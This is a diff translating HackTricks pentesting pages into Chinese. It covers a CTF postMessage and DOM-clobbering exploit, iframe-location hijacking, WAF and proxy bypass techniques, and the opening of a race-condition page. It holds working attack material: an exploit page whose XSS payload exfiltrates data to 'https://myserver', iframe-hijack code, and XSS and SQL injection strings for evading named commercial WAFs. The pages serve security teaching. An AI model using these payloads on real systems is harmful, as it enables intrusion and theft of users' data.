-The way to bypass the **first check** is by making **`window.calc.contentWindow`** to **`undefined`** and **`e.source`** to **`null`**:
-
-- **`window.calc.contentWindow`** is actually **`document.getElementById("calc")`**. You can clobber **`document.getElementById`** with **`<img name=getElementById />`** (note that Sanitizer API -[here](https://wicg.github.io/sanitizer-api/#dom-clobbering)- is not configured to protect against DOM clobbering attacks in its default state).
-  - Therefore, you can clobber **`document.getElementById("calc")`** with **`<img name=getElementById /><div id=calc></div>`**. Then, **`window.calc`** will be **`undefined`**.
-  - Now, we need **`e.source`** to be **`undefined`** or **`null`** (because `==` is used instead of `===`, **`null == undefined`** is **`True`**). Getting this is "easy". If you create an **iframe** and **send** a **postMessage** from it and immediately **remove** the iframe, **`e.origin`** is going to be **`null`**. Check the following code
+绕过 **第一个检查** 的方法是将 **`window.calc.contentWindow`** 设置为 **`undefined`**，并将 **`e.source`** 设置为 **`null`**：
 
+- **`window.calc.contentWindow`** 实际上是 **`document.getElementById("calc")`**。你可以用 **`<img name=getElementById />`** 来覆盖 **`document.getElementById`**（请注意，Sanitizer API -[here](https://wicg.github.io/sanitizer-api/#dom-clobbering)- 在其默认状态下未配置以防止 DOM 覆盖攻击）。
+- 因此，你可以用 **`<img name=getElementById /><div id=calc></div>`** 来覆盖 **`document.getElementById("calc")`**。然后，**`window.calc`** 将是 **`undefined`**。
+- 现在，我们需要 **`e.source`** 为 **`undefined`** 或 **`null`**（因为使用的是 `==` 而不是 `===`，**`null == undefined`** 为 **`True`**）。实现这一点是“简单”的。如果你创建一个 **iframe** 并从中 **发送** 一个 **postMessage**，然后立即 **移除** 该 iframe，**`e.origin`** 将变为 **`null`**。检查以下代码
 ```javascript
 let iframe = document.createElement("iframe")
 document.body.appendChild(iframe)
@@ -28,60 +25,56 @@ await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
 iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
 document.body.removeChild(iframe) //e.origin === null
 ```
+为了绕过关于令牌的**第二个检查**，可以发送值为`null`的**`token`**并使**`window.token`**的值为**`undefined`**：
 
-In order to bypass the **second check** about token is by sending **`token`** with value `null` and making **`window.token`** value **`undefined`**:
-
-- Sending `token` in the postMessage with value `null` is trivial.
-- **`window.token`** in calling the function **`getCookie`** which uses **`document.cookie`**. Note that any access to **`document.cookie`** in **`null`** origin pages tigger an **error**. This will make **`window.token`** have **`undefined`** value.
-
-The final solution by [**@terjanq**](https://twitter.com/terjanq) is the [**following**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html):
+- 在postMessage中发送值为`null`的`token`是微不足道的。
+- **`window.token`**在调用使用**`document.cookie`**的函数**`getCookie`**时。请注意，在**`null`**源页面对**`document.cookie`**的任何访问都会触发**错误**。这将使**`window.token`**的值为**`undefined`**。
 
+最终解决方案由[**@terjanq**](https://twitter.com/terjanq)提供，见[**以下**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-calc-html)：
 ```html
 <html>
-  <body>
-    <script>
-      // Abuse "expr" param to cause a HTML injection and
-      // clobber document.getElementById and make window.calc.contentWindow undefined
-      open(
-        'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
-      )
+<body>
+<script>
+// Abuse "expr" param to cause a HTML injection and
+// clobber document.getElementById and make window.calc.contentWindow undefined
+open(
+'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
+)
 
-      function start() {
-        var ifr = document.createElement("iframe")
-        // Create a sandboxed iframe, as sandboxed iframes will have origin null
-        // this null origin will document.cookie trigger an error and window.token will be undefined
-        ifr.sandbox = "allow-scripts allow-popups"
-        ifr.srcdoc = `<script>(${hack})()<\/script>`
+function start() {
+var ifr = document.createElement("iframe")
+// Create a sandboxed iframe, as sandboxed iframes will have origin null
+// this null origin will document.cookie trigger an error and window.token will be undefined
+ifr.sandbox = "allow-scripts allow-popups"
+ifr.srcdoc = `<script>(${hack})()<\/script>`
 
-        document.body.appendChild(ifr)
+document.body.appendChild(ifr)
 
-        function hack() {
-          var win = open("https://obligatory-calc.ctf.sekai.team")
-          setTimeout(() => {
-            parent.postMessage("remove", "*")
-            // this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
-            // token=null equals to undefined and e.source will be null so null == undefined
-            win.postMessage(
-              {
-                token: null,
-                result:
-                  "<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
-              },
-              "*"
-            )
-          }, 1000)
-        }
+function hack() {
+var win = open("https://obligatory-calc.ctf.sekai.team")
+setTimeout(() => {
+parent.postMessage("remove", "*")
+// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
+// token=null equals to undefined and e.source will be null so null == undefined
+win.postMessage(
+{
+token: null,
+result:
+"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
+},
+"*"
+)
+}, 1000)
+}
 
-        // this removes the iframe so e.source becomes null in postMessage event.
-        onmessage = (e) => {
-          if (e.data == "remove") document.body.innerHTML = ""
-        }
-      }
-      setTimeout(start, 1000)
-    </script>
-  </body>
+// this removes the iframe so e.source becomes null in postMessage event.
+onmessage = (e) => {
+if (e.data == "remove") document.body.innerHTML = ""
+}
+}
+setTimeout(start, 1000)
+</script>
+</body>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
index 9c8a7549d..6c7389bd5 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md
@@ -4,31 +4,28 @@
 
 ## Changing child iframes locations
 
-According to [**this writeup**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/), if you can iframe a webpage without X-Frame-Header that contains another iframe, you can **change the location of that child iframe**.
+根据[**这篇文章**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)，如果你可以在没有 X-Frame-Header 的情况下将一个网页嵌入为 iframe，并且该网页包含另一个 iframe，你可以**更改该子 iframe 的位置**。
 
-For example, if abc.com have efg.com as iframe and abc.com didn't have X-Frame header, I could change the efg.com to evil.com cross origin using, **`frames.location`**.
-
-This is specially useful in **postMessages** because if a page is sending sensitive data using a **wildcard** like `windowRef.postmessage("","*")` it's possible to **change the location of the related iframe (child or parent) to an attackers controlled location** and steal that data.
+例如，如果 abc.com 将 efg.com 作为 iframe，而 abc.com 没有 X-Frame header，我可以使用 **`frames.location`** 将 efg.com 更改为 evil.com 跨域。
 
+这在 **postMessages** 中特别有用，因为如果一个页面使用 **通配符** 发送敏感数据，如 `windowRef.postmessage("","*")`，则可以**将相关 iframe（子或父）的位置信息更改为攻击者控制的位置**并窃取该数据。
 ```html
 <html>
-  <iframe src="https://docs.google.com/document/ID" />
-  <script>
-    //pseudo code
-    setTimeout(function () {
-      exp()
-    }, 6000)
+<iframe src="https://docs.google.com/document/ID" />
+<script>
+//pseudo code
+setTimeout(function () {
+exp()
+}, 6000)
 
-    function exp() {
-      //needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
-      setInterval(function () {
-        window.frames[0].frame[0][2].location =
-          "https://geekycat.in/exploit.html"
-      }, 100)
-    }
-  </script>
+function exp() {
+//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
+setInterval(function () {
+window.frames[0].frame[0][2].location =
+"https://geekycat.in/exploit.html"
+}, 100)
+}
+</script>
 </html>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md
index 739ef9209..9f514d36f 100644
--- a/src/pentesting-web/proxy-waf-protections-bypass.md
+++ b/src/pentesting-web/proxy-waf-protections-bypass.md
@@ -1,4 +1,4 @@
-# Proxy / WAF Protections Bypass
+# 代理 / WAF 保护绕过
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -6,98 +6,91 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Bypass Nginx ACL Rules with Pathname Manipulation <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
+## 通过路径名操作绕过 Nginx ACL 规则 <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
 
-Techniques [from this research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
-
-Nginx rule example:
+技术 [来自这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
 
+Nginx 规则示例：
 ```plaintext
 location = /admin {
-    deny all;
+deny all;
 }
 
 location = /admin/ {
-    deny all;
+deny all;
 }
 ```
-
-In order to prevent bypasses Nginx performs path normalization before checking it. However, if the backend server performs a different normalization (removing characters that nginx doesn't remove) it might be possible to bypass this defense.
+为了防止绕过，Nginx 在检查路径之前执行路径规范化。然而，如果后端服务器执行不同的规范化（移除 Nginx 不移除的字符），则可能会绕过此防御。
 
 ### **NodeJS - Express**
 
-| Nginx Version | **Node.js Bypass Characters** |
-| ------------- | ----------------------------- |
-| 1.22.0        | `\xA0`                        |
-| 1.21.6        | `\xA0`                        |
-| 1.20.2        | `\xA0`, `\x09`, `\x0C`        |
-| 1.18.0        | `\xA0`, `\x09`, `\x0C`        |
-| 1.16.1        | `\xA0`, `\x09`, `\x0C`        |
+| Nginx 版本 | **Node.js 绕过字符** |
+| ----------- | --------------------- |
+| 1.22.0      | `\xA0`                |
+| 1.21.6      | `\xA0`                |
+| 1.20.2      | `\xA0`, `\x09`, `\x0C` |
+| 1.18.0      | `\xA0`, `\x09`, `\x0C` |
+| 1.16.1      | `\xA0`, `\x09`, `\x0C` |
 
 ### **Flask**
 
-| Nginx Version | **Flask Bypass Characters**                                    |
-| ------------- | -------------------------------------------------------------- |
-| 1.22.0        | `\x85`, `\xA0`                                                 |
-| 1.21.6        | `\x85`, `\xA0`                                                 |
-| 1.20.2        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
-| 1.18.0        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
-| 1.16.1        | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| Nginx 版本 | **Flask 绕过字符**                                      |
+| ----------- | -------------------------------------------------------- |
+| 1.22.0      | `\x85`, `\xA0`                                         |
+| 1.21.6      | `\x85`, `\xA0`                                         |
+| 1.20.2      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.18.0      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
+| 1.16.1      | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
 
 ### **Spring Boot**
 
-| Nginx Version | **Spring Boot Bypass Characters** |
-| ------------- | --------------------------------- |
-| 1.22.0        | `;`                               |
-| 1.21.6        | `;`                               |
-| 1.20.2        | `\x09`, `;`                       |
-| 1.18.0        | `\x09`, `;`                       |
-| 1.16.1        | `\x09`, `;`                       |
+| Nginx 版本 | **Spring Boot 绕过字符** |
+| ----------- | ------------------------- |
+| 1.22.0      | `;`                       |
+| 1.21.6      | `;`                       |
+| 1.20.2      | `\x09`, `;`               |
+| 1.18.0      | `\x09`, `;`               |
+| 1.16.1      | `\x09`, `;`               |
 
 ### **PHP-FPM**
 
-Nginx FPM configuration:
-
+Nginx FPM 配置：
 ```plaintext
 location = /admin.php {
-    deny all;
+deny all;
 }
 
 location ~ \.php$ {
-    include snippets/fastcgi-php.conf;
-    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
+include snippets/fastcgi-php.conf;
+fastcgi_pass unix:/run/php/php8.1-fpm.sock;
 }
 ```
+Nginx 被配置为阻止对 `/admin.php` 的访问，但可以通过访问 `/admin.php/index.php` 来绕过此限制。
 
-Nginx is configured to block access to `/admin.php` but it's possible to bypass this by accessing `/admin.php/index.php`.
-
-### How to prevent
-
+### 如何防止
 ```plaintext
 location ~* ^/admin {
-    deny all;
+deny all;
 }
 ```
+## 绕过 Mod Security 规则 <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
 
-## Bypass Mod Security Rules <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
+### 路径混淆
 
-### Path Confusion
+[**在这篇文章中**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) 解释了 ModSecurity v3（直到 3.0.12）**错误地实现了 `REQUEST_FILENAME`** 变量，该变量本应包含访问的路径（直到参数开始）。这是因为它执行了 URL 解码以获取路径。\
+因此，像 `http://example.com/foo%3f';alert(1);foo=` 这样的请求在 mod security 中将认为路径只是 `/foo`，因为 `%3f` 被转换为 `?`，结束了 URL 路径，但实际上服务器接收到的路径将是 `/foo%3f';alert(1);foo=`。
 
-[**In this post**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) is explained that ModSecurity v3 (until 3.0.12), **improperly implemented the `REQUEST_FILENAME`** variable which was supposed to contain the accessed path (until the start of the parameters). This is because it performed an URL decode to get the path.\
-Therefore, a request like `http://example.com/foo%3f';alert(1);foo=` in mod security will suppose that the path is just `/foo` because `%3f` is transformed into `?` ending the URL path, but actually the path that a server will receive will be `/foo%3f';alert(1);foo=`.
+变量 `REQUEST_BASENAME` 和 `PATH_INFO` 也受到此错误的影响。
 
-The variables `REQUEST_BASENAME` and `PATH_INFO` were also affected by this bug.
+在 Mod Security 的版本 2 中发生了类似的情况，允许绕过一种保护，该保护阻止用户访问与备份文件相关的特定扩展名的文件（例如 `.bak`），只需通过将点 URL 编码为 `%2e` 发送请求，例如：`https://example.com/backup%2ebak`。
 
-Something similar ocurred in version 2 of Mod Security that allowed to bypass a protection that prevented user accessing files with specific extensions related to backup files (such as `.bak`) simply by sending the dot URL encoded in `%2e`, for example: `https://example.com/backup%2ebak`.
+## 绕过 AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
 
-## Bypass AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
+### 格式错误的头部
 
-### Malformed Header
-
-[This research](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) mentions that it was possible to bypass AWS WAF rules applied over HTTP headers by sending a "malformed" header that wasn't properly parsed by AWS but it was by the backend server.
-
-For example, sending the following request with a SQL injection in the header X-Query:
+[这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) 提到可以通过发送一个“格式错误”的头部来绕过应用于 HTTP 头部的 AWS WAF 规则，该头部未被 AWS 正确解析，但被后端服务器解析。 
 
+例如，发送以下请求，在头部 X-Query 中包含 SQL 注入：
 ```http
 GET / HTTP/1.1\r\n
 Host: target.com\r\n
@@ -106,36 +99,34 @@ X-Query: Value\r\n
 Connection: close\r\n
 \r\n
 ```
+可以绕过 AWS WAF，因为它无法理解下一行是头部值的一部分，而 NODEJS 服务器可以（这个问题已被修复）。
 
-It was possible to bypass AWS WAF because it wouldn't understand that the next line is part of the value of the header while the NODEJS server did (this was fixed).
+## 通用 WAF 绕过
 
-## Generic WAF bypasses
+### 请求大小限制
 
-### Request Size Limits
+通常，WAF 对请求的长度有一定的限制，如果 POST/PUT/PATCH 请求超过该限制，WAF 将不会检查该请求。
 
-Commonly WAFs have a certain length limit of requests to check and if a POST/PUT/PATCH request is over it, the WAF won't check the request.
+- 对于 AWS WAF，您可以 [**查看文档**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**
 
-- For AWS WAF, you can [**check the documentation**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**
+<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>可以检查的应用负载均衡器和 AWS AppSync 保护的 web 请求体的最大大小</td><td>8 KB</td></tr><tr><td>可以检查的 CloudFront、API Gateway、Amazon Cognito、App Runner 和 Verified Access 保护的 web 请求体的最大大小**</td><td>64 KB</td></tr></tbody></table>
 
-<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>Maximum size of a web request body that can be inspected for Application Load Balancer and AWS AppSync protections</td><td>8 KB</td></tr><tr><td>Maximum size of a web request body that can be inspected for CloudFront, API Gateway, Amazon Cognito, App Runner, and Verified Access protections**</td><td>64 KB</td></tr></tbody></table>
+- 来自 [**Azure 文档**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**
 
-- From [**Azure docs**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**
+较旧的 Web 应用防火墙使用核心规则集 3.1（或更低版本）允许大于 **128 KB** 的消息，通过关闭请求体检查，但这些消息不会被检查漏洞。对于较新版本（核心规则集 3.2 或更高版本），可以通过禁用最大请求体限制来实现。当请求超过大小限制时：
 
-Older Web Application Firewalls with Core Rule Set 3.1 (or lower) allow messages larger than **128 KB** by turning off request body inspection, but these messages won't be checked for vulnerabilities. For newer versions (Core Rule Set 3.2 or newer), the same can be done by disabling the maximum request body limit. When a request exceeds the size limit:
+如果是 **预防模式**：记录并阻止请求。\
+如果是 **检测模式**：检查到限制，忽略其余部分，并在 `Content-Length` 超过限制时记录。
 
-If p**revention mode**: Logs and blocks the request.\
-If **detection mode**: Inspects up to the limit, ignores the rest, and logs if the `Content-Length` exceeds the limit.
+- 来自 [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**
 
-- From [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**
+默认情况下，WAF 仅检查请求的前 8KB。通过添加高级元数据，可以将限制提高到 128KB。
 
-By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB by adding Advanced Metadata.
+- 来自 [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**
 
-- From [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**
-
-Up to 128KB.
-
-### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
+最多 128KB。
 
+### 混淆 <a href="#obfuscation" id="obfuscation"></a>
 ```bash
 # IIS, ASP Clasic
 <%s%cr%u0131pt> == <script>
@@ -143,58 +134,54 @@ Up to 128KB.
 # Path blacklist bypass - Tomcat
 /path1/path2/ == ;/path1;foo/path2;bar/;
 ```
+### Unicode 兼容性 <a href="#unicode-compatability" id="unicode-compatability"></a>
 
-### Unicode Compatability <a href="#unicode-compatability" id="unicode-compatability"></a>
-
-Depending on the implementation of Unicode normalization (more info [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), characters that share Unicode compatability may be able to bypass the WAF and execute as the intended payload. Compatible characters can be found [here](https://www.compart.com/en/unicode).
-
-#### Example <a href="#example" id="example"></a>
+根据 Unicode 规范化的实现（更多信息 [here](https://jlajara.gitlab.io/Bypass_WAF_Unicode)），共享 Unicode 兼容性的字符可能能够绕过 WAF 并作为预期的有效负载执行。兼容字符可以在 [here](https://www.compart.com/en/unicode) 找到。
 
+#### 示例 <a href="#example" id="example"></a>
 ```bash
 # under the NFKD normalization algorithm, the characters on the left translate
 # to the XSS payload on the right
 ＜img src⁼p onerror⁼＇prompt⁽1⁾＇﹥  --> ＜img src=p onerror='prompt(1)'>
 ```
+### 绕过上下文 WAF 的编码 <a href="#ip-rotation" id="ip-rotation"></a>
 
-### Bypass Contextual WAFs with encodings <a href="#ip-rotation" id="ip-rotation"></a>
+正如在 [**这篇博客文章**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization) 中提到的，为了绕过能够维护用户输入上下文的 WAF，我们可以利用 WAF 技术来实际规范化用户输入。
 
-As mentioned in [**this blog post**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization), In order to bypass WAFs able to maintain a context of the user input we could abuse the WAF techniques to actually normalize the users input.
+例如，在文章中提到 **Akamai 对用户输入进行了 10 次 URL 解码**。因此，像 `<input/%2525252525252525253e/onfocus` 这样的内容将被 Akamai 视为 `<input/>/onfocus`，这 **可能认为是可以的，因为标签是闭合的**。然而，只要应用程序没有对输入进行 10 次 URL 解码，受害者将看到类似 `<input/%25252525252525253e/onfocus` 的内容，这 **仍然有效用于 XSS 攻击**。
 
-For example, in the post it's mentioned that **Akamai URL decoded a user input 10 times**. Therefore something like `<input/%2525252525252525253e/onfocus` will be seen by Akamai as `<input/>/onfocus` which **might think that it's ok as the tag is closed**. However, as long as the application doesn't URL decode the input 10 times, the victim will see something like `<input/%25252525252525253e/onfocus` which is **still valid for a XSS attack**.
+因此，这允许在 WAF 将解码和解释的编码组件中 **隐藏有效载荷**，而受害者则不会。
 
-Therefore, this allows to **hide payloads in encoded components** that the WAF will decode and interpret while the victim won't.
+此外，这不仅可以通过 URL 编码的有效载荷来实现，还可以通过其他编码方式，如 unicode、hex、octal 等...
 
-Moreover, this can be done not only with URL encoded payloads but also with other encodings such as unicode, hex, octal...
-
-In the post the following final bypasses are suggested:
+在文章中建议了以下最终绕过方法：
 
 - Akamai:`akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>`
 - Imperva:`imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">`
 - AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
 - Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`
 
-It's also mentioned that depending on **how some WAFs understand the context** of the user input, it might be possible to abuse it. The proposed example in the blog is that Akamai allow(ed) to put anything between `/*` and `*/` (potentially because this is commonly used as comments. Therefore, a SQLinjection such as `/*'or sleep(5)-- -*/` won't be caught and will be valid as `/*` is the starting string of the injection and `*/` is commented.
+还提到，根据 **某些 WAF 如何理解用户输入的上下文**，可能会存在滥用的可能性。博客中提出的例子是 Akamai 允许在 `/*` 和 `*/` 之间放置任何内容（可能是因为这通常用作注释）。因此，像 `/*'or sleep(5)-- -*/` 这样的 SQL 注入将不会被捕获，并且是有效的，因为 `/*` 是注入的起始字符串，而 `*/` 是注释。
 
-These kind of context problems can also be used to **abuse other vulnerabilities than the one expected** to be exploited by the WAF (e.g. this could also be used to exploit a XSS).
+这些上下文问题也可以用来 **滥用其他比 WAF 预期的漏洞**（例如，这也可以用来利用 XSS）。
 
-### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>
+### H2C 走私 <a href="#ip-rotation" id="ip-rotation"></a>
 
 {{#ref}}
 h2c-smuggling.md
 {{#endref}}
 
-### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>
+### IP 轮换 <a href="#ip-rotation" id="ip-rotation"></a>
 
-- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): Generate an API gateway URL to by used with ffuf
-- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): Similar to fireprox
-- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): Burp Suite plugin that uses API gateway IPs
-- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): A dynamically determined number of container instances are activated based on the input file size and split factor, with the input split into chunks for parallel execution, such as 100 instances processing 100 chunks from a 10,000-line input file with a split factor of 100 lines.
+- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): 生成一个 API 网关 URL 以供 ffuf 使用
+- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): 类似于 fireprox
+- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): 使用 API 网关 IP 的 Burp Suite 插件
+- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): 根据输入文件大小和拆分因子动态确定的容器实例数量被激活，输入被拆分为块以进行并行执行，例如 100 个实例处理来自 10,000 行输入文件的 100 个块，拆分因子为 100 行。
 - [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
 
-### Regex Bypasses
-
-Different techniques can be used to bypass the regex filters on the firewalls. Examples include alternating case, adding line breaks, and encoding payloads. Resources for the various bypasses can be found at [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) and [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). The examples below were pulled from [this article](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
+### 正则表达式绕过
 
+可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效载荷。各种绕过的资源可以在 [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) 和 [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html) 找到。以下示例来自 [这篇文章](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)。
 ```bash
 <sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
 <<script>alert(XSS)</script> #prepending an additional "<"
@@ -215,12 +202,11 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 <a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
 ```
+## 工具
 
-## Tools
+- [**nowafpls**](https://github.com/assetnote/nowafpls): Burp 插件，通过长度向请求添加垃圾数据以绕过 WAF
 
-- [**nowafpls**](https://github.com/assetnote/nowafpls): Burp plugin to add junk data to requests to bypass WAFs by length
-
-## References
+## 参考
 
 - [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
 - [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
@@ -232,4 +218,3 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri
 {% embed url="https://websec.nl/" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/race-condition.md b/src/pentesting-web/race-condition.md
index 1bfb8e748..a2324174c 100644
--- a/src/pentesting-web/race-condition.md
+++ b/src/pentesting-web/race-condition.md
@@ -3,109 +3,104 @@
 <figure><img src="../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+今天获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
 
 {{#include ../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> For obtaining a deep understanding of this technique check the original report in [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
+> 要深入了解此技术，请查看原始报告 [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
 
-## Enhancing Race Condition Attacks
+## 增强竞争条件攻击
 
-The main hurdle in taking advantage of race conditions is making sure that multiple requests are handled at the same time, with **very little difference in their processing times—ideally, less than 1ms**.
+利用竞争条件的主要障碍是确保多个请求同时处理，**处理时间差异非常小——理想情况下，少于 1 毫秒**。
 
-Here you can find some techniques for Synchronizing Requests:
+在这里，您可以找到一些同步请求的技术：
 
-#### HTTP/2 Single-Packet Attack vs. HTTP/1.1 Last-Byte Synchronization
+#### HTTP/2 单包攻击与 HTTP/1.1 最后字节同步
 
-- **HTTP/2**: Supports sending two requests over a single TCP connection, reducing network jitter impact. However, due to server-side variations, two requests may not suffice for a consistent race condition exploit.
-- **HTTP/1.1 'Last-Byte Sync'**: Enables the pre-sending of most parts of 20-30 requests, withholding a small fragment, which is then sent together, achieving simultaneous arrival at the server.
+- **HTTP/2**：支持通过单个 TCP 连接发送两个请求，减少网络抖动的影响。然而，由于服务器端的变化，两个请求可能不足以实现一致的竞争条件利用。
